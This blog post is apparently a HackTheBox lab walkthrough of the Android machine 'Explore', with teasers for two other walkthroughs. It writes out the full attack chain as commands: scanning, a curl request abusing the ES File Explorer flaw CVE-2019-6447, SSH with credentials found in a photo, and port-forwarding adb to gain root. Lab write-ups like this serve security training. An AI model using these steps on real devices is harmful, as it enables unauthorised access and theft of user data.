Skip to main content

HackTheBox Walkthrough - Explore


🛡️Types of OS : Android

🌞Released on : 26th June 2021

☢️Difficulty : Easy

👍Point: 20

nmap -vv — reason -Pn -A — osscan-guess — version-all -p- $IP -oN Explore.nmap

nmap_scan.report

💉Running the nmap scan gives four ports

port 2222 — ssh

port 59777 — http

port 5555 — adbshell {This can be found by looking on google}

adb_shell_port

ffuf -u http://explore.htb:59777/FUZZ -w /usr/share/wordlists/dirb/big.txt -t 200 -c

ffuf_scan

😃Lets visit the web-page

😜As you can see its showing forbidden. So lets try some other directory.

😃And we get the same results. Lets try to enumerate port 59777 which service uses this port on android.

☺️we get this article from Daily-Swigg which explain the vulnerability in ES File explorer which exposes user data on open port and anyone can read it.

😏Lets try running FFUF on http://explore.htb:59777/sdcard/

ffuf_sdcard

😏Look like we found our first flag. So easy

😁The POC for the above vulnerability can be found on this link

👍Going through POC i found we can execute command

😌looking from above picture we can find some basic command so let’s try them.

curl — header “Content-Type: application/json” — request POST — data ‘{“command”:”listFiles”}’ http://explore.htb:59777/sdcard/DCIM

image

🤔Lets check creds.jpg

ssh_creds

😊Here we found creds for ssh. Now lets ssh in the box

ssh kristi@explore.htb -p 2222

Password authentication

Password:

:/ $ id

uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768

😃I check does the user have execution right but it does-not. So basically we cannot install anything to get root. But we have 5555 port open which is running adb shell. I tried to access it from my kali machine but i couldn’t.

open_ports

😶As we can see 5555 is listening, so lets try to port forward it through ssh and try to connect it through our box.

ssh -L 5555:127.0.0.1:5555 kristi@explore.htb -p 2222

adb connect localhost:5555

connected to localhost:5555

adb shell

error: more than one device/emulator

😊Run the following command to get shell, if it shows the error like above then try to list the devices by this adb devices

🥳As you can see there are two devices connected. Therefore lets connect to a specific device through the command adb -s localhost:5555 shell instruction fort his command can be found here

💖And we get root on connecting through adb shell.

🥳The root flag can be found in data directory.

............Rooted...........

💖Summary of knowledge

💉ES File Explorer Security Vulnerability CVE-2019–6447

🛡️ssh port forwarding to get root

Comments

Post a Comment

Popular posts from this blog

HackTheBox Active Machine Walkthrough - Knife 🗡️

😍A knife is only as good as the one who wields it Hocho Knife #Easy #Linux Machine created by MrKN16H went live 22 May 2021 at 19:00:00 UTC. 😜Let's Start the journey..... 🔐Enumeration🔰 💉From Dmitry result one thing caught my and that is it an apache httpd server instead of regular nginx in all the HackTheBox Machine. 🔰We can find 2 Open Ports. In Port 80 We can see web page. 🔧As the latest release for apache httpd is 2.4.46 there could be a known vuln in 2.4.41 so I looked for it on web. 🗽Looking for it I stumbled around this Rapid7 Post https://www.rapid7.com/db/vulnerabilities/apache-httpd-cve-2020-1934/. 🔰But there is one concerning thing about this exploit you need to have mod_proxy_ftp module running and have FTP backend which we know nothing of. 🖥️Web-Visting🛡️ 🤔We can find this static page and nothing  interesting in it.  🔐Looking the source code found pen.js which looked interesting but after looking at it got nothing interesting. Also added knife.htb in /etc/h...
6 comments
Read more

HacktheBox Walkthrough - Shoppy

🟥Name ➡️ Shoppy 🟥Release Date ➡️ 17 Sep 2022 🟥Retire Date ➡️ 14 Jan 2023 🟥OS  ➡️ Linux 🟥Base Points Easy ➡️ [20] 🟥First Blood User 6 mins, 03 seconds 22sh 🟥First Blood Root 12 mins, 37 seconds 22sh 👉Shoppy was much easier to exploit From there, I’ll need the lighest of reverse enginnering to get a static password from a binary, which gets me to the next user. 👉I’ll start by finding a website and use a NoSQL injection to bypass the admin login page, and another to dump users and hashes. 👉This user is in the docker group, so I’ll load an image mounting the host file system, and get full disk access. 👉Shoppy was one of the easier HackTheBox weekly machines to exploit, though identifying the exploits for the initial foothold could be a bit tricky. 👉With a cracked hash, I’ll log into a Mattermost server where I’ll find creds to the box that work for SSH. 👉In Beyond Root, a video walkthrough of the vulnerable web-server code, showing how the injections worked, an...
Post a Comment
Read more